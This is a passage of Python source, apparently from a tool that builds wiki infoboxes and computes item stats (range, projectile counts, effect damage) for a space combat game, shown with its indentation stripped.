infobox['image1'] = image
effectIcons = GetShieldEffectIconsForItem(primaryItem, "positive")
if effectIcons:
effectIcons += ' '
effectIcons += GetShieldEffectIconsForItem(primaryItem, "negative")
if effectIcons:
infobox['effect_icons'] = effectIcons
vdata = [ GetItemSkillLevel(i) for i in itemList ]
displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join([str(x) for x in vdata])
if displayData != '999':
infobox['required_skill'] = "{} {}".format(GetItemSkillName(primaryItem), displayData)
vdata = [ GeneralUtils.NumDisplay(i['maxModifier'], 3) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
if displayData != '0':
infobox['maximum_charge'] = "{}x".format(displayData)
vdata = [ GeneralUtils.NumDisplay(i['chargeModifier'], 3) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
if displayData != '0':
infobox['recharge_rate'] = "{}x".format(displayData)
vdata = [ GeneralUtils.NumDisplay(i['chargeDelay'], 3) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "s / ".join(vdata)
infobox['recharge_delay'] = "{}s".format(displayData)
effectList = GetEffectNameListForItem(primaryItem)
if effectList:
vdata = [ GeneralUtils.NumDisplay(i['effectAmount'] * 100, 0) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "% / ".join(vdata)
if displayData != '0':
if len(effectList) > 1:
infobox['effect'] = ''
for effectName in effectList:
infobox['effect'] += '[[:Category:{}|{}]]<br>\n'.format(effectName, effectName)
infobox['effect'] += '{}%'.format(displayData)
else:
infobox['effect'] = "[[:Category:{0}|{0}]] {1}%".format(effectList[0], displayData)
with suppress(KeyError):
if primaryItem['resistExtraEffect'] >= 0:
infobox['additional_resistance'] = "[[:Category:{0}|{0}]]".format(SmallConstants.effectsData[primaryItem['resistExtraEffect']]['name'])
vdata = [ ItemDisplayStatBPLocation(i) for i in itemList ]
if vdata[0]:
displayData = vdata[0] if len(set(vdata)) == 1 else "<br>\n".join(vdata)
infobox['blueprint_location'] = displayData
return infobox
def GetWikiInfoboxDataForAugmentation(itemList):
# Template name is Infobox_Augmentation
primaryItem = itemList[-1]
infobox = OrderedDict()
splitItemName = SplitNameIntoBaseNameAndItemLevel(primaryItem['name'])
source = GetItemSourceExtended(primaryItem, True)
sourceClass = GetItemSourceClassName(primaryItem)
if source is not None:
if sourceClass:
infobox['source'] = '<span class="{}">{}</span>'.format(sourceClass, source)
else:
infobox['source'] = source
if sourceClass:
infobox['title1'] = '<span class="{}">{}</span>'.format(sourceClass, splitItemName['fullNameMinusLevel'])
else:
infobox['title1'] = splitItemName['fullNameMinusLevel']
image = GetItemWikiImage(primaryItem)
if image:
infobox['image1'] = image
vdata = [ GetItemSkillLevel(i) for i in itemList ]
displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join([str(x) for x in vdata])
if displayData != '999':
infobox['required_skill'] = "{} {}".format(GetItemSkillName(primaryItem), displayData)
effectList = GetEffectNameListForItem(primaryItem)
if effectList:
infobox['effect'] = ''
for effectName in effectList:
infobox['effect'] += '[[:Category:Effect:{}|{}]]<br>\n'.format(effectName, effectName)
try:
if 'effect' in infobox and primaryItem['effectTime'] >= 0:
vdata = [ GeneralUtils.NumDisplay(i['effectTime'], 1) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "s / ".join(vdata)
infobox['effect_time'] = "{}s".format(displayData)
except:
pass
vdata = [ ItemDisplayStatBPLocation(i) for i in itemList ]
if vdata[0]:
displayData = vdata[0] if len(set(vdata)) == 1 else "<br>\n".join(vdata)
infobox['blueprint_location'] = displayData
return infobox
def GetWikiInfoboxDataForCollectible(itemList):
# Template name is Infobox_Collectible
primaryItem = itemList[-1]
infobox = OrderedDict()
splitItemName = SplitNameIntoBaseNameAndItemLevel(primaryItem['name'])
source = GetItemSourceExtended(primaryItem, True)
sourceClass = GetItemSourceClassName(primaryItem)
if source is not None:
if sourceClass:
infobox['source'] = '<span class="{}">{}</span>'.format(sourceClass, source)
else:
infobox['source'] = source
if sourceClass:
infobox['title1'] = '<span class="{}">{}</span>'.format(sourceClass, splitItemName['fullNameMinusLevel'])
else:
infobox['title1'] = splitItemName['fullNameMinusLevel']
image = GetItemWikiImage(primaryItem)
if image:
infobox['image1'] = image
bpLoc = ItemDisplayStatBPLocation(primaryItem)
if bpLoc:
infobox['blueprint_location'] = image
return infobox
def GetItemShieldEffect(item, includeEffectLevel=False):
try:
if item['type'] != 5 and item['effect'] > 0:
effect = SmallConstants.effectLookup[item['effect']].replace('_', ' ').title()
except:
pass
def IsItemHidden(item):
with suppress(KeyError):
if GetRaceForItem(item) in Config.unreleasedRaceList:
return True
if item['id'] in itemIdListToSkip:
return True
return False
def IsItemNprExclusive(item):
try:
if item['race'] > 1 and item['id'] in SmallConstants.raceData[item['race']]['dontUse']:
return True
except:
pass
try:
if item['race'] > 1 and item['id'] in SmallConstants.raceData[item['race']]['omitFromLoot']:
return True
except:
pass
try:
if item['equipCategory'] == 7: # Ultra Rare
return True
except:
pass
return False
def GetDamagePerRoundForItem(item):
with suppress(AttributeError, KeyError):
return Config.weaponDamagePerHitOverride[item['name']]
ctd = GetItemContinuousDamageTotalDamage(item)
if ctd:
return ctd / GetItemLife(item)
subWeapon = GetItemSubWeapon(item)
if subWeapon: return GetDamagePerRoundForItem(subWeapon)
with suppress(KeyError):
return item['damage']
def GetAllItemsSharingItemRange(item, funcItemList=...):
if funcItemList is ...:
funcItemList = itemData
skipVariants = True
range = GetRangeDataForItem(item, skipVariants)
with suppress(KeyError, TypeError):
rtnList = []
for itemId in range['items']:
if itemDataDict[itemId] in funcItemList:
rtnList.append(itemDataDict[itemId])
if len(rtnList) > 1:
return rtnList
nameInfo = SplitNameIntoBaseNameAndItemLevel(item['name'])
if nameInfo['fullNameMinusLevel'] != item['name']:
return [ v for v in funcItemList if SplitNameIntoBaseNameAndItemLevel(v['name'])['fullNameMinusLevel'] == nameInfo['fullNameMinusLevel']]
return [ item ]
def GetRangeDataForItem(item, skipVariants=False):
altItemId = item['id']
variantIdx = None
if not skipVariants:
m = re.match(r'^(.+?)v(\d+)(_\d+)?$', altItemId)
if m:
altItemId = m.group(1)
variantIdx = int(m.group(2))
for k,v in itemRangeData.items():
if item['id'] in v['items'] or (variantIdx is not None and altItemId in v['items'] and len(v['variants']) > variantIdx):
return v
return None
def GetVariantDataForItem(item):
try:
if item['variantID'] >= 0:
return itemVariantData[item['variantID']]
except:
pass
return None
def GetCraftingDataForItem(item):
for k,v in itemCraftableData.items():
if item['id'] in v['items']:
return v
if 'micro gate' in item['name'].lower() and 'loca' not in item['name'].lower():
prefix = item['name'].split(' ')[-1]
systemInfo = GalaxyUtils.GetSystemByPrefix(prefix)
if systemInfo:
return GalaxyUtils.GetCraftingRecipeForSystem(systemInfo)
return None
def GetItemById(id):
try:
return itemDataDict[id]
except:
return None
def GetItemByName(name, itemList=...):
if itemList is ...:
itemList = itemData
try:
for v in itemList:
if v['name'] == name:
return v
except:
pass
return None
def SplitNameIntoBaseNameAndItemLevel(input):
levelList1 = [ "I", "II", "III", "IV", "V", "VI", "VII", "VIII", "IX", "X", "XI", "XII", "XIII", "XIV", "XV", "XVI", "XVII", "XVIII", "XIX", "XX" ];
levelList2 = [ "ONE", "TWO", "THREE", "FOUR", "FIVE", "SIX", "SEVEN", "EIGHT", "NINE", "TEN" ];
levelList3 = [ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10" ];
postfixList = [ "ARRAY", "BARRAGE", "CLOUD", "CLUSTER", "SMALL ARRAY", "STORM", "TORPEDO", "VOLLEY" ];
input = input.strip()
parts = input.split(' ')
name = input
postfixDisplay = parts[-1].upper().rstrip('S')
postfix = None
if postfixDisplay in postfixList and len(parts) > 1:
postfix = parts[-1]
levelDisplay = parts[-2].upper().rstrip('S')
levelDisplayOrig = parts[-2]
name = name.replace(' {}'.format(postfix), '')
else:
levelDisplay = postfixDisplay
levelDisplayOrig = parts[-1]
levelIdx = None
if levelDisplay in levelList1:
levelIdx = levelList1.index(levelDisplay)
elif levelDisplay in levelList2:
levelIdx = levelList2.index(levelDisplay)
elif levelDisplay in levelList3:
levelIdx = levelList3.index(levelDisplay)
if levelIdx is not None:
name = name[:-1*len(levelDisplayOrig)-1]
else:
levelDisplay = ""
fullNameMinusLevel = name
if postfix:
fullNameMinusLevel = '{} {}'.format(name, postfix)
return { 'name': name, 'fullNameMinusLevel': fullNameMinusLevel, 'levelDisplay': levelDisplayOrig, 'levelIdx': levelIdx, 'namePostfix': postfix }
def IsBeamWeapon(item):
if "id" in item and item['id'] in beamWeaponOverrideIdList:
return True
if "initSpeed" in item and GeneralUtils.floatCmp(item['initSpeed'], '>', 0):
return False
if "maxSpeed" in item and GeneralUtils.floatCmp(item['maxSpeed'], '>', 0):
return False
if "guidance" not in item or GeneralUtils.floatCmp(item['guidance'], '!=', 1):
return False
if "life" not in item or GeneralUtils.floatCmp(GetItemLife(item), '>', 1):
return False
if "lockingRange" not in item or GeneralUtils.floatCmp(item['lockingRange'], '>', 100):
return False
return True
def GetItemMinRange(item):
rtnVal = ""
itemGuidance = SmallConstants.guidanceLookup[item['guidance']] if 'guidance' in item else ''
try:
if GeneralUtils.floatCmp(item['armingTime'], '>', 0) and itemGuidance != 'NO_COLLISION':
acceleration = item['acceleration']
if GeneralUtils.floatCmp(item['initSpeed'], '>', item['maxSpeed']) and GeneralUtils.floatCmp(acceleration, '>', 0):
acceleration *= -1
ttts = abs(item['maxSpeed'] - item['initSpeed']) / abs(item['acceleration'])
if GeneralUtils.floatCmp(ttts, '>', item['armingTime']):
rtnVal = item['armingTime']**2 * acceleration / 2 + item['armingTime'] * item['initSpeed']
else:
rtnVal = ttts**2 * acceleration / 2 + ttts * item['initSpeed'] + item['maxSpeed'] * (item['armingTime'] - ttts)
except:
pass
return rtnVal
def GetItemRange(item):
rtnVal = 0
with suppress(AttributeError, KeyError):
return Config.weaponRangeOverride[item['name']]
subWeapon = GetItemSubWeapon(item)
with suppress(KeyError):
if item['weaponType'] == 5 and subWeapon:
return GetItemRange(subWeapon)
itemGuidance = SmallConstants.guidanceLookup[item['guidance']] if 'guidance' in item else ''
if 'Smart' not in item['name'] and itemGuidance in ['UNGUIDED', 'ATTACHED']:
if 'weaponType' not in item or item['weaponType'] != 5:
try:
acceleration = item['acceleration']
if GeneralUtils.floatCmp(item['initSpeed'], '>', item['maxSpeed']) and GeneralUtils.floatCmp(acceleration, '>', 0):
acceleration *= -1
ttts = abs(item['maxSpeed'] - item['initSpeed']) / abs(acceleration)
if GeneralUtils.floatCmp(ttts, '>', GetItemLife(item)):
rtnVal = GetItemLife(item)**2 * acceleration / 2 + GetItemLife(item) * item['initSpeed']
else:
rtnVal = ttts**2 * acceleration / 2 + ttts * item['initSpeed'] + item['maxSpeed'] * (GetItemLife(item) - ttts)
except:
if item['maxSpeed'] > 0:
if item['maxSpeed'] != item['initSpeed'] and item['initSpeed'] > 0:
rtnVal = item['initSpeed'] * GetItemLife(item)
else:
rtnVal = item['maxSpeed'] * GetItemLife(item)
try:
if rtnVal == 0 and subWeapon:
return GetItemRange(subWeapon)
except:
pass
try:
if item['augType'] == 15 and rtnVal == 0 and subWeapon:
return GetItemRange(subWeapon) * 0.5
except:
pass
try:
if rtnVal == 0 and item['lockingRange'] > 0:
rtnVal = item['lockingRange']
except:
pass
return rtnVal
def GetTurretSubWeapon(item):
try:
rangeData = GetRangeDataForItem(item)
baseSubWeapon = GetItemById(rangeData['range'])
nameInfo = SplitNameIntoBaseNameAndItemLevel(item['name'])
if nameInfo['levelIdx'] is None or nameInfo['levelIdx'] == 0:
return baseSubWeapon
m = re.match(r'^(.+?)v(\d+)(_\d+)?$', baseSubWeapon['id'])
if m:
realId = '{}_{}'.format(baseSubWeapon['id'], nameInfo['levelIdx'])
if m.group(3):
replaceLen = len(m.group(3)) * -1
realId = baseSubWeapon['id'][0:replaceLen]
realId += str(nameInfo['levelIdx'])
subWeapon = GetItemById(realId)
if subWeapon:
return subWeapon
subRangeData = GetRangeDataForItem(baseSubWeapon)
return GetItemById(subRangeData['items'][nameInfo['levelIdx']])
except:
pass
def GetItemSubWeapon(item):
try:
return GetItemById(Config.subWeaponIDOverride[item['name']])
except:
pass
try:
return GetItemById(item['subWeaponID'])
except:
pass
try:
if item['augType'] == 15:
return GetTurretSubWeapon(item)
except:
pass
def DisplayDamageAsPerSecond(item):
if GetItemContinuousDamageTotalDamage(item) is not None:
return True
if 'fireRate' in item and GeneralUtils.floatCmp(item['fireRate'], '==', 0):
return True
nameCmp = item['name'].lower()
if 'deathtrap' in nameCmp or 'death trap' in nameCmp:
return False
if 'thunder' in nameCmp or 'bug zapper' in nameCmp:
return True
if 'tornadian hurricane' in nameCmp or 'radicane' in nameCmp or 'firestorm' in nameCmp:
return True
if 'tornadian' in nameCmp and 'storm' in nameCmp:
return True
if 'light saw' in nameCmp:
return True
return False
def DisplayDamageAsPerHit(item):
return GetItemTotalHitCount(item) is not None
def GetNumOfDamagingProjectiles(item, isForDisplay=False):
f = GetNumOfDamagingProjectiles
if "cloudTypeProjCountRegex" not in f.__dict__:
f.cloudTypeProjCountRegex = re.compile(r'.* fires (\d+) \[subWeapon\]s', re.I)
cloudTypeProjCountRegex = f.cloudTypeProjCountRegex
if item['name'] in Config.projectileCountOverride:
return Config.projectileCountOverride[item['name']]
try:
if item['augType'] == 15:
subWeapon = GetItemSubWeapon(item)
if subWeapon: return GetNumOfDamagingProjectiles(subWeapon, isForDisplay)
except:
pass
nameCmp = item['name'].lower()
amount = item['amount'] if 'amount' in item and item['amount'] > 0 else 1
lt = GetItemLife(item)
if 'thunder' in nameCmp or 'bug zapper' in nameCmp:
if not isForDisplay and lt is not None:
return lt * amount
return amount
if 'light saw' in nameCmp:
if not isForDisplay and lt is not None:
return lt * amount
return amount
if 'tornadian hurricane' == nameCmp or 'radicane' == nameCmp or 'firestorm' == nameCmp:
if not isForDisplay:
return lt
return amount
if 'tornadian' in nameCmp and 'storm' in nameCmp:
if not isForDisplay:
return lt
return amount
varData = GetVariantDataForItem(item)
if varData and varData['overrideName'].lower() == "cluster [name] torpedo":
if not isForDisplay:
return 10 * amount
return amount
if 'broadside' in nameCmp:
if 'dark light' in nameCmp: return 8
if 'double' in nameCmp: return 10
return 5
# if 'radial' in nameCmp and 'black light cannon' not in nameCmp:
if 'radial' in nameCmp and 'black light cannon' not in nameCmp and 'resonite' not in nameCmp:
if 'plus' in nameCmp: return 16 * amount
return 8 * amount
if 'black light volley' in nameCmp:
return 8 * amount
if 'black light bombard' in nameCmp:
return 8 * 5
if 'cake bomb' in nameCmp:
return 16 # Could be 15... Need to re-test
if amount > 1: return amount
# if isForDisplay and 'cloud' in nameCmp:
# return 1
try:
varData = GetVariantDataForItem(item)
match = cloudTypeProjCountRegex.match(varData['descriptionAppend'])
return int(match.group(1))
except:
pass
try:
varDesc = item['variant']['deviceOverride']['descriptionOverride']
match = cloudTypeProjCountRegex.match(varDesc)
return int(match.group(1))
except:
pass
try:
desc = GetItemDescription(item, useHtmlForLinks=False, performLinkReplacement=False)
match = re.match(r'.*\bfires (\d+) ', desc, re.I)
return int(match.group(1))
except:
pass
return amount
def GetItemTotalHitCount(item):
with suppress(AttributeError, KeyError):
return Config.weaponHitCountOverride[item['name']]
subWeapon = GetItemSubWeapon(item)
if subWeapon:
val = GetItemTotalHitCount(subWeapon)
if val: return val
def GetItemContinuousDamageTotalDamage(item):
with suppress(AttributeError, KeyError):
return Config.weaponContinuousDamageTotalDamageOverride[item['name']]
subWeapon = GetItemSubWeapon(item)
if subWeapon:
val = GetItemContinuousDamageTotalDamage(subWeapon)
if val: return val
def GetItemLife(item):
with suppress(AttributeError, KeyError):
return Config.weaponLifeOverride[item['name']]
subWeapon = GetItemSubWeapon(item)
if subWeapon:
val = GetItemLife(subWeapon)
if val: return val
with suppress(AttributeError, KeyError):
return item['life']
def GetItemTotalDamagePerVolley(item):
effectDamage = None
message = None
totalDamage = 0
ctd = GetItemContinuousDamageTotalDamage(item)
if ctd:
totalDamage = ctd
elif DisplayDamageAsPerHit(item):
totalDamage = GetDamagePerRoundForItem(item) * GetItemTotalHitCount(item)
else:
totalDamage = GetDamagePerRoundForItem(item) * GetNumOfDamagingProjectiles(item)
itemType = GetItemType(item)
if itemType != 'Shield':
effectDamage = GetItemEffectDamage(item)
if effectDamage:
totalDamage += effectDamage
return totalDamage
def GetItemMaxSpeed(item):
subWeapon = GetItemSubWeapon(item)
if subWeapon:
return GetItemMaxSpeed(subWeapon)
if 'maxSpeed' in item and GeneralUtils.floatCmp(item['maxSpeed'], '>', 0):
return item['maxSpeed']
def GetItemInitialSpeed(item):
subWeapon = GetItemSubWeapon(item)
if subWeapon:
return GetItemInitialSpeed(subWeapon)
if 'initSpeed' in item and GeneralUtils.floatCmp(item['initSpeed'], '>', 0):
return item['initSpeed']
def GetRaceForItem(item):
return SmallConstants.GetNprNameFromId(item['race'])
def GetItemDamageType(item):
with suppress(KeyError):
return GeneralUtils.CamelCaseToTitleCase(SmallConstants.damageTypeLookup[item['damageType']])
def GetShieldEffectIconsForItem(item, type="both"):
rtnVal = ""
statusList = GetShieldStatusEffectList(item)
if type == "both" or type == "positive":
for effectName in statusList['positiveEffects']:
with suppress(KeyError):
className = Config.shieldEffectIconClassMapping[effectName]
if className[:6].lower() == '[html]':
iconHtml = className[6:]
rtnVal += '<span class="shieldEffectPositive" title="{}">{}</span>'.format(effectName, iconHtml)
else:
rtnVal += '<span class="shieldEffectPositive {}" title="{}"></span>'.format(className, effectName)
if type == "both" or type == "negative":
rtnVal += ' '
for effectName in statusList['negativeEffects']:
with suppress(KeyError):
className = Config.shieldEffectIconClassMapping[effectName]
if className[:6].lower() == '[html]':
iconHtml = className[6:]
rtnVal += '<span class="shieldEffectNegative" title="{}">{}</span>'.format(effectName, iconHtml)
else:
rtnVal += '<span class="shieldEffectNegative {}" title="{}"></span>'.format(className, effectName)
return rtnVal.strip()
def GetDamageTypeIconForItem(item):
damageType = GetItemDamageType(item)
with suppress(KeyError):
className = Config.damageTypeIconClassMapping[damageType.title().replace(' ', '')]
if className[:6].lower() == '[html]':
iconHtml = className[6:]
return '<span class="damageType{}" title="Damage Type: {}">{}</span>'.format(damageType.title().replace(' ', ''), damageType, iconHtml)
else:
return '<span class="damageType{} {}" title="Damage Type: {}"></span>'.format(damageType.title().replace(' ', ''), className, damageType)
return ''
def GetEffectIconForItem(item):
# damageType = GetItemDamageType(item)
# with suppress(KeyError):
# return '<span class="damageType{} {}" title="Damage Type: {}"></span>'.format(damageType.title().replace(' ', ''), Config.damageTypeIconClassMapping[damageType.title().replace(' ', '')], damageType)
return ''
def GetShieldStatusEffectList(item):
itemType = SmallConstants.typeLookup[item['type']].replace('_WEAPON', '').title()
rtnList = { 'positiveEffects': set(), 'negativeEffects': set() }
if itemType == 'Shield':
if item['effect'] > 0:
effectName = GetShieldEffectName(item, False)
if effectName == 'Tornadian':
rtnList['positiveEffects'].add('Projectile')
rtnList['negativeEffects'].add('Electrostatic')
elif effectName == 'Vampire':
rtnList['positiveEffects'].add('Gravity')
elif effectName == 'Devimon':
rtnList['positiveEffects'].add('Gravity')
rtnList['positiveEffects'].add('Heat Resist')
elif effectName == 'Enlightened':
rtnList['positiveEffects'].add('Heat Resist')
rtnList['negativeEffects'].add('Projectile')
elif effectName == 'Solarion':
rtnList['positiveEffects'].add('Heat Resist')
rtnList['negativeEffects'].add('Projectile')
rtnList['negativeEffects'].add('Frozen')
elif effectName == 'Rock':
rtnList['positiveEffects'].add('Explosive')
rtnList['negativeEffects'].add('Laser')
rtnList['negativeEffects'].add('Photonic')
elif effectName == 'Refractive':
rtnList['positiveEffects'].add('Laser')
rtnList['positiveEffects'].add('Photonic')
rtnList['negativeEffects'].add('Explosive')
elif effectName == 'Andromedan':
rtnList['positiveEffects'].add('Stealth - Andromedan')
rtnList['negativeEffects'].add('Heat Weakness')
elif effectName == 'Anti Gravity':
rtnList['positiveEffects'].add('Gravity')
elif effectName == 'Anti Nuclear':
rtnList['positiveEffects'].add('Nuclear')
elif effectName == 'Insulator':
rtnList['positiveEffects'].add('Electrostatic')
elif effectName == 'Human Ghostly':
rtnList['positiveEffects'].add('Ghostly')
elif effectName == 'Ascendant':
rtnList['positiveEffects'].add('NPR Damage')
elif effectName == 'Dark':
rtnList['positiveEffects'].add('Gravity')
rtnList['positiveEffects'].add('Cold Fusion')
else:
rtnList['positiveEffects'].add(effectName)
with suppress(KeyError):
if item['resistExtraEffect'] >= 0:
effectName = SmallConstants.effectsData[item['resistExtraEffect']]['name']
if effectName:
rtnList['positiveEffects'].add(effectName)
rtnList['positiveEffects'] = sorted(list(rtnList['positiveEffects']))
rtnList['negativeEffects'] = sorted(list(rtnList['negativeEffects']))
return rtnList
def GetDescriptionForItemRangeList(itemList, enclosureStr=None):
if not enclosureStr:
enclosureStr = ''
vdata = [ GetItemDescription(i) for i in itemList ]
vdata = [ v for v in vdata if v ] # Skip any empty descriptions
if len(set(vdata)) == 1:
return [ "{1}{0}{1}".format(vdata[0], enclosureStr) if vdata[0] != '' else '' ]
rtnList = []
idx = 0
for item in itemList:
if len(vdata) > idx:
nameInfo = SplitNameIntoBaseNameAndItemLevel(item['name'])
rtnList.append("{2}{0}{2} -Level {1}".format(vdata[idx], nameInfo['levelDisplay'], enclosureStr))
idx += 1
return rtnList
def GetCategoryListForItem(item):
rtnSet = set()
itemType = SmallConstants.typeLookup[item['type']].replace('_', ' ').title()
nprPageName = WikiUtils.GetNprWikiPageByNprName(GetRaceForItem(item))
if nprPageName:
rtnSet.add(nprPageName)
with suppress(KeyError):
if item['equipCategory'] == 7:
rtnSet.add('Ultra Rare')
if itemType == 'Collectible':
rtnSet.add('Collectible')
if itemType == 'Primary Weapon':
rtnSet.add('Energy Based')
if itemType == 'Secondary Weapon' and 'energyBased' in item:
if item['energyBased']:
rtnSet.add('Energy Based')
else:
rtnSet.add('Ammo Based')
if 'seasonal' in item and item['seasonal']:
rtnSet.add("Seasonal Items")
damageCat = GetDamageTypeForItem(item, True)
if damageCat:
rtnSet.add(damageCat.replace(' Damage', ''))
rtnSet.add('Damage:{}'.format(damageCat))
effectList = GetEffectNameListForItem(item)
for effect in effectList:
rtnSet.add(effect.replace(' Damage', '').replace(' Resist', '').replace(' Weakness', ''))
if itemType != 'Shield':
rtnSet.add('Effect:{}'.format(effect))
else:
rtnSet.add(effect)
with suppress(KeyError):
if itemType == 'Shield':
if item['resistExtraEffect'] >= 0:
effectName = SmallConstants.effectsData[item['resistExtraEffect']]['name']
if effectName:
rtnSet.add(effectName)
if item['name'] == 'Radii Nanite Repair':
rtnSet.add('Heat')
augType = GetItemAugType(item)
if augType == 'Fire Extinguisher':
rtnSet.add('Heat')
elif augType == 'Energy To Shield':
rtnSet.add('Shield Recharge')
elif augType == 'Radiation Charging':
rtnSet.add('Energy Recharge')
rtnSet.add('Heat')
elif augType == 'S/E Balancer':
rtnSet.add('Energy Recharge')
rtnSet.add('Shield Recharge')
elif augType in ['Andromedan Power Source', "Dark Energy Charging", "Dartian Converter", 'Solar Panel Upgrade', 'Shield To Energy', 'Devimon Energize']:
rtnSet.add('Energy Recharge')
elif augType in ['Dartian Hyperspace', "Hyperspace Recharge Booster"]:
rtnSet.add('Hyperspace Recharge')
if 'stealth' in item and item['stealth']:
rtnSet.add('Stealthed')
if 'Shield Repair' in rtnSet:
rtnSet.add('Shield Recharge')
stealthEffectList = ['Hidden by Smoke', 'Light Bending Stealth', 'Transparent Stealth', 'Absorbing Stealth', 'Reflecting Stealth', 'Stealth - Andromedan']
for sn in stealthEffectList:
if sn in rtnSet:
rtnSet.add('Stealth')
break
if 'impact' in item and item['impact'] < 0:
rtnSet.add('Negative Impact')
return sorted(list(rtnSet))
def GetDamageTypeForItem(item, forCategoryUse=False):
# damageTypesRequiringPostfix = ['Electrostatic', 'Explosive', 'Ghostly', 'Heat', 'Laser', 'Photonic', 'Projectile']
damageType = None
if ('damage' in item and item['damage'] > 0):
try:
damageType = GeneralUtils.CamelCaseToTitleCase(SmallConstants.damageTypeLookup[item['damageType']])
if forCategoryUse:
if damageType == 'None' or damageType == 'Unknown' or damageType == 'Other':
damageType = None
elif damageType == 'Hyperspace Harvest':
damageType = 'Hyperspace Recharge'
elif damageType == 'Energy Harvest':
damageType = 'Energy Recharge'
# elif damageType in damageTypesRequiringPostfix:
# damageType += ' Damage'
except:
pass
subWeapon = GetItemSubWeapon(item)
if (not damageType or damageType == 'None') and subWeapon:
damageType = GetDamageTypeForItem(subWeapon, forCategoryUse)
return damageType
def GetItemEffectDamage(item, shipMass=..., amount=...):
if amount is ...:
amount = GetNumOfDamagingProjectiles(item)
if shipMass is ...:
shipMass = Config.shipMassForDamageCalculation
subWeapon = GetItemSubWeapon(item)
if subWeapon: return GetItemEffectDamage(subWeapon, shipMass, amount)
with suppress(KeyError):
if item['effect'] >= 0:
effectInfo = SmallConstants.effectsData[item['effect']]
effectName = effectInfo['name']
effectTime = item['effectTime'] * amount
if 'cap' in effectInfo and GeneralUtils.floatCmp(effectInfo['cap'], '>', 0):
effectTime = min(round(effectTime), effectInfo['cap'])
if effectName == 'Radiation Damage':
# Radiation is (6 * m * t/3) + (4 * m * t/3) + (2 * m * t/3) Where m is ship mass, t is effect time (using highest stacked time)
# This simplifies down to a short 4 * m * t
return round(4 * shipMass * effectTime, 2)
elif effectName == 'Corrosion':
# Corrosion damage is time remaining as damage per second. So 15 secs of corrosion with no refresh would be 15 + 14 + 13 ... + 1 damage
return (effectTime + 1) * effectTime / 2
else:
return round(SmallConstants.effectDamagesData[effectName] * effectTime, 2)
def GetItemEffectDamagePerSecond(item, shipMass=..., amount=...):
if amount is ...:
amount = GetNumOfDamagingProjectiles(item)
if shipMass is ...:
shipMass = Config.shipMassForDamageCalculation
subWeapon = GetItemSubWeapon(item)
if subWeapon: return GetItemEffectDamagePerSecond(subWeapon, shipMass, amount)
totalDamage = 0
numShotsToTest = None
with suppress(KeyError):
if 'weaponType' in item and item['weaponType'] == 5:
fireRate = 60
elif 'fireRate' in item and GeneralUtils.floatCmp(item['fireRate'], '>', 0):
fireRate = item['fireRate']
else:
# No fire rate probably means beam type weapon
fireRate = 1 # For effect purposes, beams are applied at a rate of 1 per second
if item['energyBased']:
numShotsToTest = int(100 / item['ammoOrEnergyUsage'])
else:
numShotsToTest = int(item['ammoOrEnergyUsage'])
if Config.debug: print("GetItemEffectDamagePerSecond: shots to test", numShotsToTest)
if Config.debug: print("GetItemEffectDamagePerSecond: fire rate in use", fireRate)
try:
if numShotsToTest and item['effect'] >= 0:
effectInfo = SmallConstants.effectsData[item['effect']]
effectName = effectInfo['name']
totalTime = 0
timeSinceLastCalc = 0
for i in range(0, numShotsToTest):
# if Config.debug: print("testing shot number", i)
if GeneralUtils.floatCmp(timeSinceLastCalc, '>=', 1):
secondsToCalc = math.floor(timeSinceLastCalc)
# if Config.debug: print("secondsToCalc", secondsToCalc)
# if Config.debug: print("totalTime", totalTime)
if effectName == 'Radiation Damage':
# Radiation is (6 * m * t/3) + (4 * m * t/3) + (2 * m * t/3) Where m is ship mass, t is effect time (using highest stacked time)
if GeneralUtils.floatCmp(secondsToCalc, '>', effectTime):
# Full damage calculation
totalDamage += 4 * shipMass * secondsToCalc
else:
t2End = totalTime / 3
t1End = t2End * 2
# tier 1 calculation
t1Seconds = min(math.floor(t1End), secondsToCalc)
totalDamage += 6 * shipMass * t1Seconds
remaining = secondsToCalc - t1Seconds
# tier 2 calculation
if GeneralUtils.floatCmp(remaining, '>=', 1):
t2Seconds = min(math.floor(t1End), math.floor(remaining))
totalDamage += 4 * shipMass * t2Seconds
remaining -= t2Seconds
# tier 3 calculation
if GeneralUtils.floatCmp(remaining, '>=', 1):
t3Seconds = math.floor(remaining)
totalDamage += 2 * shipMass * t3Seconds
remaining -= t3Seconds
totalTime -= secondsToCalc
elif effectName == 'Corrosion':
# Corrosion damage is time remaining as damage per second
totalDamage += (totalTime + (totalTime - secondsToCalc + 1)) * secondsToCalc / 2
totalTime -= secondsToCalc
else:
# If the effectTime > speedUpIfOver apply a damage multiplier
for j in range(0, secondsToCalc):
effectDamageMult = 1
if 'speedUpIfOver' in effectInfo and GeneralUtils.floatCmp(effectInfo['speedUpIfOver'], '>', 0):
if GeneralUtils.floatCmp(effectInfo['speedUpIfOver'], '<', totalTime):
effectDamageMult = totalTime / effectInfo['speedUpIfOver']
totalDamage += SmallConstants.effectDamagesData[effectName] * effectDamageMult
totalTime -= 1
timeSinceLastCalc -= secondsToCalc
# if Config.debug: print("totalDamage", totalDamage)
effectTime = item['effectTime'] * amount
totalTime += effectTime
if 'cap' in effectInfo and GeneralUtils.floatCmp(effectInfo['cap'], '>', 0):
totalTime = min(totalTime, effectInfo['cap'])
timeSinceLastCalc += fireRate
if GeneralUtils.floatCmp(timeSinceLastCalc, '>=', 1):
secondsToCalc = math.floor(timeSinceLastCalc)
# if Config.debug: print("secondsToCalc", secondsToCalc)
# if Config.debug: print("totalTime", totalTime)
if effectName == 'Radiation Damage':
# Radiation is (6 * m * t/3) + (4 * m * t/3) + (2 * m * t/3) Where m is ship mass, t is effect time (using highest stacked time)
if GeneralUtils.floatCmp(secondsToCalc, '>', effectTime):
# Full damage calculation
totalDamage += 4 * shipMass * secondsToCalc
timeSinceLastCalc = 0
else:
t2End = totalTime / 3
t1End = t1End * 2
# tier 1 calculation
t1Seconds = min(math.floor(t1End), secondsToCalc)
totalDamage += 6 * shipMass * t1Seconds
remaining = secondsToCalc - t1Seconds
# tier 2 calculation
if GeneralUtils.floatCmp(remaining, '>=', 1):
